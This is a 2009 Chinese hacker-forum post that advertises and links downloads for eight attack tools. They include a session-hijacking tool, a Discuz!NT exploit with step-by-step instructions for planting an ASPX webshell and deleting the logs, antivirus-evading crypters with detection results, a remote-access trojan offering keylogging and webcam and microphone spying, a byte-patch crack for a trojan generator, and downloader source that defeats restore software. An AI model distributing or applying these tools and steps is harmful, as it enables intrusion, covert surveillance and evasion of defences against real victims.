打印

[原创] [09.16]黑客精品软件更新[软件兵器库整理]

[09.16]黑客精品软件更新[软件兵器库整理]

友情提示:

1. 此更新合集由软件兵器库整理,图片上传到免费空间,可能观看速度有些慢,请耐心等待下或者刷新下!

2. 所有软件均来自网络,我们保证您下载的软件无任何捆绑,至于有无后门请自行检测!

3. 软件上传于免费网盘, 点击进入下载地址后即可下载. 为防止网盘下载失效,从即日起增加论坛地址,如果网盘地址失效,可以访问论坛地址进行下载!

4. 对于使用工具造成的一切违法行为一律与本站无关!

5. 欢迎访问软件兵器库 专注收集更新国内外最新黑软! 地址: www.286hacktools.cn

6. 关于无法打开某些VB的免杀软件.捆绑器等等 请看: http://www.286hacktools.cn/read.php?tid=755

7. 宣传论坛,免费观看黑鹰全套vip教程: http://www.286hacktools.cn/read.php?tid=737




引用:
今日更新列表:

1. [入侵辅助] MaxHijack 1.4 (No Arp欺骗的会话劫持工具)

2. [入侵辅助] 政政Discuz!NT 2.5.0 漏洞利用工具 1.0

3. [免杀工具] Trojka Crypter v1.1 无壳版

4. [免杀工具] New Egy Crypter Modded

5. [远程控制] 落雪远程控制协助系统2009 0915

6. [远程控制] 落雪远程协助系统0915 DLL 文件无壳版

7. [木马后门] 伯乐生成器全套[无壳版,附破解方法]

8. [程序源代码] 穿目前所有还原的下载者 C++源码

引用:
1. MaxHijack 1.4 (No Arp欺骗的会话劫持工具)

软件大小: 310 kb
软件说明:

No Arp欺骗的会话劫持工具,支持上行,下行双向劫持。

更新:

整合Httphijack 的功能并大大提高效率;
增加上行劫持方式 即可用于服务器网络;
更新引擎库;

使用说明:

1.设置网卡,网关IP,本地IP
2.下行劫持: 例如本机为192.168.3.3 目标为同一个子网的192.168.3.4 那么192.168.3.4 访问任何网页都会被插入代码
3.上行劫持:本机为220.223.222.221 目标为同一个子网的220.223.222.225 那么任何访问220.223.222.225的客户端都会被插入代码
4.代理: 用于CAM欺骗的数据包的目的MAC地址
5.被动恢复CAM :等待交换机自行恢复CAM表(不建议使用)
6.HTTP注入:开启代码注入功能
7.右侧控制条为劫持包的发包频率
8.底部状态栏分别为: 状态 代理IP/MAC 目标IP 发包频率 网卡负载

注意:请自行安装winpcap和.net 2.0

解压后运行!!!

不可将本软件用于非法用途!否则后果自负,与CCTEAM无关。
Bug to cncert.net@gmail.com

程序截图:



论坛下载连接: http://www.286hacktools.cn/read.php?tid=3850

点击进入下载页面

2. 政政Discuz!NT 2.5.0 漏洞利用工具 1.0

软件大小: 620 KB
软件说明:

程序帮助:

1、先检测该论坛是否存在此漏洞
2、注册一个普通的帐号,提权成为管理员
3、更新ASPX为可上传,主要是为了上传ASPX木马的
4、去发表一个帖子,把你的ASPX木马上传上去。
5、去后台找附件的绝对路径,登陆你的ASPX木马
6、删除前台自己发的帖子,保留附件
7、更新ASPX不可上传,取后门
8、删除自己的相关日志
9、取消自己的管理员身份
10、完毕,成功拿到一台webshell

ASPX木马的一般权限都很大,很好提权,拿到一台webshell也意味着你拿了一台服务器哦~!

编写:政政


程序截图:




论坛下载连接: http://www.286hacktools.cn/read.php?tid=3841

点击进入下载页面

3. Trojka Crypter v1.1 无壳版

软件大小: 2080 KB
软件说明:

此版本为无壳版 可修改资源 国外论坛看到的 有时间的汉化下吧!

[+] Run & Scantime 100% UD
[+] Overlay Support (z.B. Bifrost)
[+] Icon Changer
[+] Lösche Server nach dem Ausführen
[+] Anti Vmware / Virutal PC
[+] Anti Sandbox
[+] Anti Kapersky
[+] Anti Anubis
[+] Packen mit UPX
[+] Exe Vergrössern (Exe Pump)
[+] Fake Message
[+] Verschlüsslungs String


程序截图:



论坛下载连接: http://www.286hacktools.cn/read.php?tid=3797

点击进入下载页面

4. New Egy Crypter Modded

软件大小: 53 Kb
软件说明:

A-Squared
Found nothing
AntiVir
Found TR/Crypt.XPACK.Gen
ArcaVir
Found nothing
Avast
Found nothing
AVG Antivirus
Found nothing
BitDefender
Found GenPack:Trojan.VB.NTE
ClamAV
Found nothing
CPsecure
Found nothing
Dr.Web
Found nothing
F-Prot Antivirus
Found nothing
F-Secure Anti-Virus
Found nothing
Ikarus
Found nothing
Kaspersky Anti-Virus
Found nothing
NOD32
Found nothing
Norman Virus Control
Found nothing
Panda Antivirus
Found nothing
Sophos Antivirus
Found nothing
VirusBuster
Found nothing
VBA32
Found nothing

程序截图:



论坛下载连接: http://www.286hacktools.cn/read.php?tid=3838

点击进入下载页面

5. 落雪远程控制协助系统2009 0915
软件大小: 926 KB
软件说明:

修改功能

软件不兼容原版红狼所有版本.
添加3322IP更新功能,直接查询外网IP
自动保存配置信息
修正上传文件下载文件卡死问题
去掉恢复SSDT功能
修改代码过咔吧查杀
修改代码过360查杀
修改配置方式,无需导出配置文件。
直接修改.\Dat\KillAbc.Cn即可
修改为XP标准界面


功能

文件管理 完全仿Radmin所写, 文件、文件夹批量上传、删除、下载、创建、重命名
屏幕监视 扫描算法速度最快可达到120帧/秒,差异算法适合网络极差的情况下传输,传输速度快,控制屏幕,发送Ctrl+Alt+Del,剪贴板操作,7种色彩显示方式,等......
键盘记录 可记录中英文信息,离线记录(记录上限50M)功能
远程终端 一个简单shell
系统管理 进程管理,窗口管理,拨号上网密码获取
视频查看 查看远程摄像头,快照,录像,压缩等功能...
语音监听 监听远程语音,同时也可以把本地语音传送给远程,进行语音聊天,GSM610压缩方式,传输流畅
会话管理 注销,重启,关机,卸载服务端
其它功能 下载执行指定URL中的程序,隐藏或者显示访问指定网址,清除系统日志
地址位置 将IP数据库文件QQWry.Dat放置程序同目录下即可显示地理位置
集群控制 可同时控制多台主机,同时打开视频监控等管理功能
备注功能 .........


程序截图:




论坛下载连接: http://www.286hacktools.cn/read.php?tid=3175

点击进入下载页面

6. 落雪远程协助系统0915 DLL 文件无壳版
软件大小: 48 KB
软件说明:


远控下载: http://www.286hacktools.cn/read.php?tid=3175


程序截图:



论坛下载连接: http://www.286hacktools.cn/read.php?tid=3836

点击进入下载页面

7. 伯乐生成器全套[无壳版,附破解方法]
软件大小: 4372 KB
软件说明:

发布: 小坏

怪物的那个加了个破壳子能扒下来的没几个
我把原版发下
有几个是破解有壳的
不过基本都是无壳的

破解方法
00402B57 51 push ecx //原
00402B57 50 PUSH EAX //破解后
把51改成50

破解版下载: http://www.286hacktools.cn/read.php?tid=3797

程序截图:



论坛下载连接: http://www.286hacktools.cn/read.php?tid=3851

点击进入下载页面

8. 穿目前所有还原的下载者 C++源码

软件大小: 1978 KB
软件说明:

下载者包括四个工程:
CDown:生成器
userinit:真正的下载者
Dat:驱动和下载者的安装程序
pass:驱动程序

原理:驱动程序可以穿透还原卡,并且可以修改系统文件,这里是通过修改系统文件userinit.exe来实现的。userinit.exe的功能很简单,就是启动explorer.exe。这里就是通过替换uerinit.exe,伪造一个userinit.exe。这个伪造的程序可以实现uerinit.exe的原始功能,并可以实现自定义的功能,比如下载执行,发送数据。

驱动的功能就是替换指定的系统文件。

将userinit Dat pass 编译出来的文件放到cdown的res里,再生成出生成器就可以使用它生成下载者,也就是这个穿还原的程序

穿过的还原软件

1. 冰点6.0企业版本下载地址

2. 快速还原 4.2

3. 网众

4. 易速还原最新版

5. 迅闪还原最新版

6. 胜天VD还原最新版 (1:胜天VD 2:贝壳磁盘保护系)

7. 强者VD还原最新版

8. 网维大师还原最新版

9. 影子系统(2008)


程序截图:

暂无

论坛下载连接: http://www.286hacktools.cn/read.php?tid=2781

点击进入下载页面

TOP